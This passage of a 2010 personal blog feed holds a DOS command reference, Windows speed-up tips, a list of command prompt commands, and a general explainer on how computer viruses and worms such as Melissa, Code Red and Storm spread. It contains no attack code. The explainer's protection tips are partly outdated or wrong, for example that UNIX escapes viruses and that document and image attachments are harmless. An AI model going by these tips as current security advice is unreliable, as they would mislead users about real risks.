type more than one line from the console into a file, use copy con (above).&lt;br /&gt;Equivalent to the Unix command echo.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;16. exe2bin&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Converts an executable (.exe) file into a binary file with the extension .com, which is a memory image of the program.&lt;br /&gt;The size of the resident code and data sections combined in the input .exe file must be less than 64KB. The file must also have no stack segment.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;17. exit&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Exits the current command processor. If the exit is used at the primary command, it has no effect unless in a DOS window under Microsoft Windows, in which case the window is closed and the user returns to the desktop.&lt;br /&gt;&lt;br /&gt;EXIT&lt;br /&gt;&lt;br /&gt;Exit also exists in Unix-shells. If an exit command is used in the primary command shell under Unix, however, it will logoff the user, similar to the control-D keystroke.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;18. fastopen&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Main article: FASTOPEN&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;19. fc or comp&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Compares two files or sets of files and displays the differences between them.&lt;br /&gt;&lt;br /&gt;FC [/A] [/C] [/L] [/LBn] [/N] [/T] [/W] [/nnnn] [drive1:][path1]filename1 [drive2:][path2]filename2&lt;br /&gt;FC /B [drive1:][path1]filename1 [drive2:][path2]filename2&lt;br /&gt;/A Displays only first and last lines for each set of differences.&lt;br /&gt;/B Performs a binary comparison.&lt;br /&gt;/C Disregards the case of letters.&lt;br /&gt;/L Compares files as ASCII text.&lt;br /&gt;/LBn Sets the maximum consecutive mismatches to the specified number of lines.&lt;br /&gt;/N Displays the line numbers on an ASCII comparison.&lt;br /&gt;/T Does not expand tabs to spaces.&lt;br /&gt;/W Compresses white space (tabs and spaces) for comparison.&lt;br /&gt;/nnnn Specifies the number of consecutive lines that must match after a mismatch.&lt;br /&gt;[drive1:][path1]filename1 Specifies the first file or set of files to compare.&lt;br /&gt;[drive2:][path2]filename2 Specifies the second file or set of files to compare.[citation needed]&lt;br /&gt;&lt;br /&gt;Equivalent to the Unix commands comm, cmp and diff.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;20. fdisk&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Manipulates hard disk partition tables. The name derives from IBM's habit of calling hard drives fixed disks. When run from the command line, it displays a menu of various partitioning operations:&lt;br /&gt;&lt;br /&gt;1. Create DOS partition or Logical DOS Drive&lt;br /&gt;2. Set active partition&lt;br /&gt;3. Delete partition or Logical DOS Drive&lt;br /&gt;4. Display partition information&lt;br /&gt;5. Change current fixed disk drive (only available if the computer has more than one hard drive)&lt;br /&gt;&lt;br /&gt;FDISK /MBR installs a standard master boot record on the hard drive.&lt;br /&gt;&lt;br /&gt;FDISK /MBR #: where # is other partition on system. Completes above command on indicated partition.&lt;br /&gt;&lt;br /&gt;eg: "C:\FDISK /MBR D:" would install boot record on D:\ partition.&lt;br /&gt;&lt;br /&gt;Fdisk exists under Unix with the same name, but it is an entirely different program. However they share purposes.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-2473999927011928876?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/2473999927011928876/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/commands-with-short-description.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2473999927011928876'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2473999927011928876'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/commands-with-short-description.html' title='Commands with Short description'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-7457854065054064821</id><published>2010-03-11T04:40:00.001-08:00</published><updated>2010-03-11T04:40:53.638-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='speedup'/><title type='text'>Speeding up Your Computer</title><content type='html'>1. Startup Processes&lt;br /&gt;&lt;br /&gt;* Go to: Start&gt;Run&gt;Type "msconfig"(without the quotes)&lt;br /&gt;* Go to the Startup Tab&lt;br /&gt;* Uncheck any processes you don't use at startup(e.x. Quicktime, AIM, MSN)&lt;br /&gt;* Click Apply then Restart&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. CCleaner&lt;br /&gt;CCleaner is a great little application that deletes cookies, clears cache, empties your recycle bin, etc.&lt;br /&gt;&lt;br /&gt;* Download CCleaner(from google)&lt;br /&gt;* Iinstall CCleaner then Run Cleaner it(note: This will clear your cookies which means your saved passwords and usernames will be gone)&lt;br /&gt;* Go to the Registry tab and Scan for Issues&lt;br /&gt;{*]After its finished scanning click&gt;Fix selected issues...&gt;Fix All Selected Issues&gt;Ok. Continue this process until scanning brings about no issues.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. Bootvis.exe&lt;br /&gt;&lt;br /&gt;* Download bootvis.exe(from google)&lt;br /&gt;* Install bootvis.exe&lt;br /&gt;* In the toolbar go to Trace&gt;Optimize System. The system will reboot after 10 seconds.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-7457854065054064821?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/7457854065054064821/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/speeding-up-your-computer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7457854065054064821'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7457854065054064821'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/speeding-up-your-computer.html' title='Speeding up Your Computer'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1342385777815877036</id><published>2010-03-11T04:33:00.000-08:00</published><updated>2010-03-11T04:35:42.277-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><title type='text'>How Computer Viruses Work</title><content type='html'>Strange as it may sound, the computer virus is something of an Information Age marvel. On one hand, viruses show us how vulnerable we are -- a properly engineered virus can have a devastating effect, disrupting productivity and doing billions of dollars in damages. On the other hand, they show us how sophisticated and interconnected human beings have become. &lt;br /&gt;&lt;br /&gt;For example, experts estimate that the Mydoom worm infected approximately a quarter-million computers in a single day in January 2004. Back in March 1999, the Melissa virus was so powerful that it forced Microsoft and a number of other very large companies to completely turn off their e-mail systems until the virus could be contained. The ILOVEYOU virus in 2000 had a similarly devastating effect. In January 2007, a worm called Storm appeared -- by October, experts believed up to 50 million computers were infected. That's pretty impressive when you consider that many viruses are incredibly simple.&lt;br /&gt;&lt;br /&gt;**When you listen to the news, you hear about many different forms of electronic infection. The most common are: &lt;br /&gt;Viruses - A virus is a small piece of software that piggybacks on real programs. For example, a virus might attach itself to a program such as a spreadsheet program. Each time the spreadsheet program runs, the virus runs, too, and it has the chance to reproduce (by attaching to other programs) or wreak havoc. &lt;br /&gt;&lt;br /&gt;E-mail viruses - An e-mail virus travels as an attachment to e-mail messages, and usually replicates itself by automatically mailing itself to dozens of people in the victim's e-mail address book. Some e-mail viruses don't even require a double-click -- they launch when you view the infected message in the preview pane of your e-mail software &lt;br /&gt;Trojanhorses - A Trojan horse is simply a computer program. The program claims to do one thing (it may claim to be a game) but instead does damage when you run it (it may erase your hard disk). Trojan horses have no way to replicate automatically. &lt;br /&gt;&lt;br /&gt;Worms - A worm is a small piece of software that uses computer networks and security holes to replicate itself. A copy of the worm scans the network for another machine that has a specific security hole. It copies itself to the new machine using the security hole, and then starts replicating from there, as well. &lt;br /&gt;*In this article, we will discuss viruses -- both "traditional" viruses and e-mail viruses -- so that you can learn how they work and understand how to protect yourself.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Virus Origins&lt;/strong&gt;&lt;br /&gt;Computer viruses are called viruses because they share some of the traits of biological viruses. A computer virus passes from computer to computer like a biological virus passes from person to person.&lt;br /&gt;Unlike a cell, a virus has no way to reproduce by itself. Instead, a biological virus must inject its DNA into a cell. The viral DNA then uses the cell's existing machinery to reproduce itself. In some cases, the cell fills with new viral particles until it bursts, releasing the virus. In other cases, the new virus particles bud off the cell one at a time, and the cell remains alive.&lt;br /&gt;&lt;br /&gt;A computer virus shares some of these traits. A computer virus must piggyback on top of some other program or document in order to launch. Once it is running, it can infect other programs or documents. Obviously, the analogy between computer and biological viruses stretches things a bit, but there are enough similarities that the name sticks.&lt;br /&gt;People write computer viruses. A person has to write the code, test it to make sure it spreads properly and then release it. A person also designs the virus's attack phase, whether it's a silly message or the destruction of a hard disk. Why do they do it?&lt;br /&gt;&lt;br /&gt;There are at least three reasons. The first is the same psychology that drives vandals and arsonists. Why would someone want to break a window on someone's car, paint signs on buildings or burn down a beautiful forest? For some people, that seems to be a thrill. If that sort of person knows computer programming, then he or she may funnel energy into the creation of destructive viruses.&lt;br /&gt;&lt;br /&gt;The second reason has to do with the thrill of watching things blow up. Some people have a fascination with things like explosions and car wrecks. When you were growing up, there might have been a kid in your neighborhood who learned how to make gunpowder. And that kid probably built bigger and bigger bombs until he either got bored or did some serious damage to himself. Creating a virus is a little like that -- it creates a bomb inside a computer, and the more computers that get infected the more "fun" the explosion.&lt;br /&gt;&lt;br /&gt;The third reason involves bragging rights, or the thrill of doing it. Sort of like Mount Everest -- the mountain is there, so someone is compelled to climb it. If you are a certain type of programmer who sees a security hole that could be exploited, you might simply be compelled to exploit the hole yourself before someone else beats you to it.&lt;br /&gt;&lt;br /&gt;Of course, most virus creators seem to miss the point that they cause real damage to real people with their creations. Destroying everything on a person's hard disk is real damage. Forcing a large company to waste thousands of hours cleaning up after a virus is real damage. Even a silly message is real damage because someone has to waste time getting rid of it. For this reason, the legal system is getting much harsher in punishing the people who create viruses.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Virus History&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Traditional computer viruses were first widely seen in the late 1980s, and they came about because of several factors. The first factor was the spread of personal computers (PCs). Prior to the 1980s, home computers were nearly non-existent or they were toys. Real computers were rare, and they were locked away for use by "experts." During the 1980s, real computers started to spread to businesses and homes because of the popularity of the IBM PC (released in 1982) and the Apple Macintosh (released in 1984). By the late 1980s, PCs were widespread in businesses, homes and college campuses. &lt;br /&gt;&lt;br /&gt;The second factor was the use of computer bulletin boards. People could dial up a bulletin board with a modem and download programs of all types. Games were extremely popular, and so were simple word processors, spreadsheets and other productivity software. Bulletin boards led to the precursor of the virus known as the Trojan horse. A Trojan horse is a program with a cool-sounding name and description. So you download it. When you run the program, however, it does something uncool like erasing your disk. You think you are getting a neat game, but it wipes out your system. Trojan horses only hit a small number of people because they are quickly discovered, the infected programs are removed and word of the danger spreads among users.&lt;br /&gt;&lt;br /&gt;The third factor that led to the creation of viruses was the floppy disk. In the 1980s, programs were small, and you could fit the entire operating system, a few programs and some documents onto a floppy disk or two. Many computers did not have hard disks, so when you turned on your machine it would load the operating system and everything else from the floppy disk. Virus authors took advantage of this to create the first self-replicating programs.&lt;br /&gt;&lt;br /&gt;Early viruses were pieces of code attached to a common program like a popular game or a popular word processor. A person might download an infected game from a bulletin board and run it. A virus like this is a small piece of code embedded in a larger, legitimate program. When the user runs the legitimate program, the virus loads itself into memory* and looks around to see if it can find any other programs on the disk. If it can find one, it modifies the program to add the virus's code into the program. Then the virus launches the "real program." The user really has no way to know that the virus ever ran. Unfortunately, the virus has now reproduced itself, so two programs are infected. The next time the user launches either of those programs, they infect other programs, and the cycle continues. &lt;br /&gt;&lt;br /&gt;If one of the infected programs is given to another person on a floppy disk, or if it is uploaded to a bulletin board, then other programs get infected. This is how the virus spreads.&lt;br /&gt;&lt;br /&gt;The spreading part is the infection phase of the virus. Viruses wouldn't be so violently despised if all they did was replicate themselves. Most viruses also have a destructive attack phase where they do damage. Some sort of trigger will activate the attack phase, and the virus will then do something -- anything from printing a silly message on the screen to erasing all of your data. The trigger might be a specific date, the number of times the virus has been replicated or something similar.&lt;br /&gt;In the next section, we will look at how viruses have evolved over the years.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Other Threats&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Viruses and worms get a lot of publicity, but they aren't the only threats to your computer's health. Malware is just another name for software that has an evil intent. Here are some common types of malware and what they might do to your infected computer:&lt;br /&gt;&lt;br /&gt;Adware puts ads up on your screen. &lt;br /&gt;Spyware collects personal information about you, like your passwords or other information you type into your computer. &lt;br /&gt;Hijackers turn your machine into a zombie computer. &lt;br /&gt;Dialers force your computer to make phone calls. For example, one might call toll 900-numbers and run up your phone bill, while boosting revenue for the owners of the 900-numbers.As virus creators became more sophisticated, they learned new tricks. One important trick was the ability to load viruses into memory so they could keep running in the background as long as the computer remained on. This gave viruses a much more effective way to replicate themselves. Another trick was the ability to infect the boot sector on floppy disks and hard disks. The boot sector is a small program that is the first part of the operating system that the computer loads. It contains a tiny program that tells the computer how to load the rest of the operating system. By putting its code in the boot sector, a virus can guarantee it is executed. It can load itself into memory immediately and run whenever the computer is on. Boot sector viruses can infect the boot sector of any floppy disk inserted in the machine, and on college campuses, where lots of people share machines, they could spread like wildfire. In general, neither executable nor boot sector viruses are very threatening any longer. The first reason for the decline has been the huge size of today's programs. Nearly every program you buy today comes on a compact disc. Compact discs (CDs) cannot be modified, and that makes viral infection of a CD unlikely, unless the manufacturer permits a virus to be burned onto the CD during production. The programs are so big that the only easy way to move them around is to buy the CD. People certainly can't carry applications around on floppy disks like they did in the 1980s, when floppies full of programs were traded like baseball cards. Boot sector viruses have also declined because operating systems now protect the boot sector.&lt;br /&gt;&lt;br /&gt;Infection from boot sector viruses and executable viruses is still possible. Even so, it is a lot harder, and these viruses don't spread nearly as quickly as they once did. Call it "shrinking habitat," if you want to use a biological analogy. The environment of floppy disks, small programs and weak operating systems made these viruses possible in the 1980s, but that environmental niche has been largely eliminated by huge executables, unchangeable CDs and better operating system safeguards.&lt;br /&gt;E-mail viruses are probably the most familiar to you. We'll look at some in the next section.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;E-mail Viruses&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Virus authors adapted to the changing computing environment by creating the e-mail virus. For example, the Melissa virus in March 1999 was spectacular. Melissa spread in Microsoft Word documents sent via e-mail, and it worked like this:&lt;br /&gt;&lt;br /&gt;Phishing and Social Engineering&lt;br /&gt;While you may be taking steps to protect your computer from becoming infected by a virus, you may very well run into another, more insidious type of attack. Phishing and other social engineering attacks have been on the rise. Social engineering is a fancy term for someone trying to get you to give up your personal information -- online or in person -- so they can use it to steal from you. Anti-spam traps may catch e-mail messages coming from phishers, but the U.S. Computer Emergency Readiness Team says the best way for you to beat them at their own game is to be wary. And never give out your personal or financial information online.&lt;br /&gt;Someone created the virus as a Word document and uploaded it to an Internet newsgroup. Anyone who downloaded the document and opened it would trigger the virus. The virus would then send the document (and therefore itself) in an e-mail message to the first 50 people in the person's address book. The e-mail message contained a friendly note that included the person's name, so the recipient would open the document, thinking it was harmless. The virus would then create 50 new messages from the recipient's machine. At that rate, the Melissa virus quickly became the fastest-spreading virus anyone had seen at the time. As mentioned earlier, it forced a number of large companies to shut down their e-mail systems.&lt;br /&gt;The ILOVEYOU virus, which appeared on May 4, 2000, was even simpler. It contained a piece of code as an attachment. People who double-clicked on the attachment launched the code. It then sent copies of itself to everyone in the victim's address book and started corrupting files on the victim's machine. This is as simple as a virus can get. It is really more of a Trojan horse distributed by e-mail than it is a virus.&lt;br /&gt;The Melissa virus took advantage of the programming language built into Microsoft Word called VBA, or Visual Basic for Applications. It is a complete programming language and it can be programmed to do things like modify files and send e-mail messages. It also has a useful but dangerous auto-execute feature. A programmer can insert a program into a document that runs instantly whenever the document is opened. This is how the Melissa virus was programmed. Anyone who opened a document infected with Melissa would immediately activate the virus. It would send the 50 e-mails, and then infect a central file called NORMAL.DOT so that any file saved later would also contain the virus. It created a huge mess.&lt;br /&gt;Microsoft applications have a feature called Macro Virus Protection built into them to prevent this sort of virus. With Macro Virus Protection turned on (the default option is ON), the auto-execute feature is disabled. So when a document tries to auto-execute viral code, a dialog pops up warning the user. Unfortunately, many people don't know what macros or macro viruses are, and when they see the dialog they ignore it, so the virus runs anyway. Many other people turn off the protection mechanism. So the Melissa virus spread despite the safeguards in place to prevent it.&lt;br /&gt;&lt;br /&gt;In the case of the ILOVEYOU virus, the whole thing was human-powered. If a person double-clicked on the program that came as an attachment, then the program ran and did its thing. What fueled this virus was the human willingness to double-click on the executable.&lt;br /&gt;Now that we've covered e-mail viruses, let's take a look at worms. &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Worms&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;A worm is a computer program that has the ability to copy itself from machine to machine. Worms use up computer time and network bandwidth when they replicate, and often carry payloads that do considerable damage. A worm called Code Red made huge headlines in 2001. Experts predicted that this worm could clog the Internet so effectively that things would completely grind to a halt.&lt;br /&gt;A worm usually exploits some sort of security hole in a piece of software or the operating system. For example, the Slammer worm (which caused mayhem in January 2003) exploited a hole in Microsoft's SQL server. "Wired" magazine took a fascinating look inside Slammer's tiny (376 byte) program.&lt;br /&gt;Worms normally move around and infect other machines through computer networks. Using a network, a worm can expand from a single copy incredibly quickly. The Code Red worm replicated itself more than 250,000 times in approximately nine hours on July 19, 2001&lt;br /&gt;The Code Red worm slowed down Internet traffic when it began to replicate itself, but not nearly as badly as predicted. Each copy of the worm scanned the Internet for Windows NT or Windows 2000 servers that did not have the Microsoft security patch installed. Each time it found an unsecured server, the worm copied itself to that server. The new copy then scanned for other servers to infect. Depending on the number of unsecured servers, a worm could conceivably create hundreds of thousands of copies.&lt;br /&gt;The Code Red worm had instructions to do three things:&lt;br /&gt;Replicate itself for the first 20 days of each month &lt;br /&gt;Replace Web pages on infected servers with a page featuring the message "Hacked by Chinese" &lt;br /&gt;Launch a concerted attack on the White House Web site in an attempt to overwhelm &lt;br /&gt;This attack would consist of the infected systems simultaneously sending 100 connections to port 80 of www.whitehouse.gov (198.137.240.91).&lt;br /&gt;The U.S. government changed the IP address of www.whitehouse.gov to circumvent that particular threat from the worm and issued a general warning about the worm, advising users of Windows NT or Windows 2000 Web servers to make sure they installed the security patch. .&lt;br /&gt;A worm called Storm, which showed up in 2007, immediately started making a name for itself. Storm uses social engineering techniques to trick users into loading the worm on their computers. So far, it's working -- experts believe between one million and 50 million computers have been &lt;br /&gt;When the worm is launched, it opens a back door into the computer, adds the infected machine to a botnet and installs code that hides itself. The botnets are small peer-to-peer groups rather than a larger, more easily identified network. Experts think the people controlling Storm rent out their micro-botnets to deliver spam or adware, or for denial-of-service attacks on Web sites.&lt;br /&gt;&lt;br /&gt;In the next section, we'll look at patching your system and other things you can do to protect your computer&lt;br /&gt;How to Protect Your Computer from Viruses&lt;br /&gt;You can protect yourself against viruses with a few simple steps:&lt;br /&gt;If you are truly worried about traditional (as opposed to e-mail) viruses, you should be running a more secure operating system like UNIX. You never hear about viruses on these operating systems because the security features keep viruses (and unwanted human visitors) away from your hard disk. &lt;br /&gt;&lt;br /&gt;If you are using an unsecured operating system, then buying virus protection software is a nice safeguard. &lt;br /&gt;If you simply avoid programs from unknown sources (like the Internet), and instead stick with commercial software purchased on CDs, you eliminate almost all of the risk from traditional viruses.You should make sure that Macro Virus Protection is enabled in all Microsoft applications, and you should NEVER run macros in a document unless you know what they do. There is seldom a good reason to add macros to a document, so avoiding all macros is a great policy. &lt;br /&gt;&lt;br /&gt;You should never double-click on an e-mail attachment that contains an executable. Attachments that come in as Word files (.DOC), spreadsheets (.XLS), images (.GIF), etc., are data files and they can do no damage (noting the macro virus problem in Word and Excel documents mentioned above). However, some viruses can now come in through .JPG graphic file attachments. A file with an extension like EXE, COM or VBS is an executable, and an executable can do any sort of damage it wants. Once you run it, you have given it permission to do anything on your machine. The only defense is never to run executables that arrive via e-mail.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1342385777815877036?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1342385777815877036/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/how-computer-viruses-work.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1342385777815877036'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1342385777815877036'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/how-computer-viruses-work.html' title='How Computer Viruses Work'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-6604781968733672388</id><published>2010-03-11T04:30:00.000-08:00</published><updated>2010-03-11T04:30:52.743-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Run'/><category scheme='http://www.blogger.com/atom/ns#' term='shortcut'/><title type='text'>All windows shortcuts</title><content type='html'>&lt;strong&gt;&lt;span style="font-size: large;"&gt;Command Prompt&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys. &lt;br /&gt;APPEND Causes MS-DOS to look in other directories when editing a file or running a command. &lt;br /&gt;ARP Displays, adds, and removes arp information from network devices. &lt;br /&gt;ASSIGN Assign a drive letter to an alternate letter. &lt;br /&gt;ASSOC View the file associations. &lt;br /&gt;AT Schedule a time to execute commands or programs. &lt;br /&gt;ATMADM Lists connections and addresses seen by Windows ATM call manager. &lt;br /&gt;ATTRIB Display and change file attributes. &lt;br /&gt;BATCH Recovery console command that executes a series of commands in a file. &lt;br /&gt;BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini &lt;br /&gt;BREAK Enable / disable CTRL + C feature. &lt;br /&gt;CACLS View and modify file ACL's. &lt;br /&gt;CALL Calls a batch file from another batch file. &lt;br /&gt;CD Changes directories. &lt;br /&gt;CHCP Supplement the International keyboard and character set information. &lt;br /&gt;CHDIR Changes directories. &lt;br /&gt;CHKDSK Check the hard disk drive running FAT for errors. &lt;br /&gt;CHKNTFS Check the hard disk drive running NTFS for errors. &lt;br /&gt;CHOICE Specify a listing of multiple options within a batch file. &lt;br /&gt;CLS Clears the screen. &lt;br /&gt;CMD Opens the command interpreter. &lt;br /&gt;COLOR Easily change the foreground and background color of the MS-DOS window. &lt;br /&gt;COMP Compares files. &lt;br /&gt;COMPACT Compresses and uncompress files. &lt;br /&gt;CONTROL Open control panel icons from the MS-DOS prompt. &lt;br /&gt;CONVERT Convert FAT to NTFS. &lt;br /&gt;COPY Copy one or more files to an alternate location. &lt;br /&gt;CTTY Change the computers input/output devices. &lt;br /&gt;DATE View or change the systems date. &lt;br /&gt;DEBUG Debug utility to create assembly programs to modify hardware settings. &lt;br /&gt;DEFRAG Re-arrange the hard disk drive to help with loading programs. &lt;br /&gt;DEL Deletes one or more files. &lt;br /&gt;DELETE Recovery console command that deletes a file. &lt;br /&gt;DELTREE Deletes one or more files and/or directories. &lt;br /&gt;DIR List the contents of one or more directory. &lt;br /&gt;DISABLE Recovery console command that disables Windows system services or drivers. &lt;br /&gt;DISKCOMP Compare a disk with another disk. &lt;br /&gt;DISKCOPY Copy the contents of one disk and place them on another disk. &lt;br /&gt;DOSKEY Command to view and execute commands that have been run in the past. &lt;br /&gt;DOSSHELL A GUI to help with early MS-DOS users. &lt;br /&gt;DRIVPARM Enables overwrite of original device drivers. &lt;br /&gt;ECHO Displays messages and enables and disables echo. &lt;br /&gt;EDIT View and edit files. &lt;br /&gt;EDLIN View and edit files. &lt;br /&gt;EMM386 Load extended Memory Manager. &lt;br /&gt;ENABLE Recovery console command to enable a disable service or driver. &lt;br /&gt;ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command. &lt;br /&gt;ERASE Erase files from computer. &lt;br /&gt;EXIT Exit from the command interpreter. &lt;br /&gt;EXPAND Expand a M*cros*ft Windows file back to it's original format. &lt;br /&gt;EXTRACT Extract files from the M*cros*ft Windows cabinets. &lt;br /&gt;FASTHELP Displays a listing of MS-DOS commands and information about them. &lt;br /&gt;FC Compare files. &lt;br /&gt;FDISK Utility used to create partitions on the hard disk drive. &lt;br /&gt;FIND Search for text within a file. &lt;br /&gt;FINDSTR Searches for a string of text within a file. &lt;br /&gt;FIXBOOT Writes a new boot sector. &lt;br /&gt;FIXMBR Writes a new boot record to a disk drive. &lt;br /&gt;FOR Boolean used in batch files. &lt;br /&gt;FORMAT Command to erase and prepare a disk drive. &lt;br /&gt;FTP Command to connect and operate on a FTP server. &lt;br /&gt;FTYPE Displays or modifies file types used in file extension associations. &lt;br /&gt;GOTO Moves a batch file to a specific label or location. &lt;br /&gt;GRAFTABL Show extended characters in graphics mode. &lt;br /&gt;HELP Display a listing of commands and brief explanation. &lt;br /&gt;IF Allows for batch files to perform conditional processing. &lt;br /&gt;IFSHLP.SYS 32-bit file manager. &lt;br /&gt;IPCONFIG Network command to view network adapter settings and assigned values. &lt;br /&gt;KEYB Change layout of keyboard. &lt;br /&gt;LABEL Change the label of a disk drive. &lt;br /&gt;LH Load a device driver in to high memory. &lt;br /&gt;LISTSVC Recovery console command that displays the services and drivers. &lt;br /&gt;LOADFIX Load a program above the first 64k. &lt;br /&gt;LOADHIGH Load a device driver in to high memory. &lt;br /&gt;LOCK Lock the hard disk drive. &lt;br /&gt;LOGON Recovery console command to list installations and enable administrator login. &lt;br /&gt;MAP Displays the device name of a drive. &lt;br /&gt;MD Command to create a new directory. &lt;br /&gt;MEM Display memory on system. &lt;br /&gt;MKDIR Command to create a new directory. &lt;br /&gt;MODE Modify the port or display settings. &lt;br /&gt;MORE Display one page at a time. &lt;br /&gt;MOVE Move one or more files from one directory to another directory. &lt;br /&gt;MSAV Early M*cros*ft Virus scanner. &lt;br /&gt;MSD Diagnostics utility. &lt;br /&gt;MSCDEX Utility used to load and provide access to the CD-ROM. &lt;br /&gt;NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT &lt;br /&gt;NET Update, fix, or view the network or network settings &lt;br /&gt;NETSH Configure dynamic and static network information from MS-DOS. &lt;br /&gt;NETSTAT Display the TCP/IP network protocol statistics and information. &lt;br /&gt;NLSFUNC Load country specific information. &lt;br /&gt;NSLOOKUP Look up an IP address of a domain or host on a network. &lt;br /&gt;PATH View and modify the computers path location. &lt;br /&gt;PATHPING View and locate locations of network latency. &lt;br /&gt;PAUSE Command used in batch files to stop the processing of a command. &lt;br /&gt;PING Test / send information to another network computer or network device. &lt;br /&gt;POPD Changes to the directory or network path stored by the pushd command. &lt;br /&gt;POWER Conserve power with computer portables. &lt;br /&gt;PRINT Prints data to a printer port. &lt;br /&gt;PROMPT View and change the MS-DOS prompt. &lt;br /&gt;PUSHD Stores a directory or network path in memory so it can be returned to at any time. &lt;br /&gt;QBASIC Open the QBasic. &lt;br /&gt;RD Removes an empty directory. &lt;br /&gt;REN Renames a file or directory. &lt;br /&gt;RENAME Renames a file or directory. &lt;br /&gt;RMDIR Removes an empty directory. &lt;br /&gt;ROUTE View and configure windows network route tables. &lt;br /&gt;RUNAS Enables a user to execute a program on another computer. &lt;br /&gt;SCANDISK Run the scandisk utility. &lt;br /&gt;SCANREG Scan registry and recover registry from errors. &lt;br /&gt;SET Change one variable or string to another. &lt;br /&gt;SETLOCAL Enables local environments to be changed without affecting anything else. &lt;br /&gt;SETVER Change MS-DOS version to trick older MS-DOS programs. &lt;br /&gt;SHARE Installs support for file sharing and locking capabilities. &lt;br /&gt;SHIFT Changes the position of replaceable parameters in a batch program. &lt;br /&gt;SHUTDOWN Shutdown the computer from the MS-DOS prompt. &lt;br /&gt;SMARTDRV Create a disk cache in conventional memory or extended memory. &lt;br /&gt;SORT Sorts the input and displays the output to the screen. &lt;br /&gt;START Start a separate window in Windows from the MS-DOS prompt. &lt;br /&gt;SUBST Substitute a folder on your computer for another drive letter. &lt;br /&gt;SWITCHES Remove add functions from MS-DOS. &lt;br /&gt;SYS Transfer system files to disk drive. &lt;br /&gt;TELNET Telnet to another computer / device from the prompt. &lt;br /&gt;TIME View or modify the system time. &lt;br /&gt;TITLE Change the title of their MS-DOS window. &lt;br /&gt;TRACERT Visually view a network packets route across a network. &lt;br /&gt;TREE View a visual tree of the hard disk drive. &lt;br 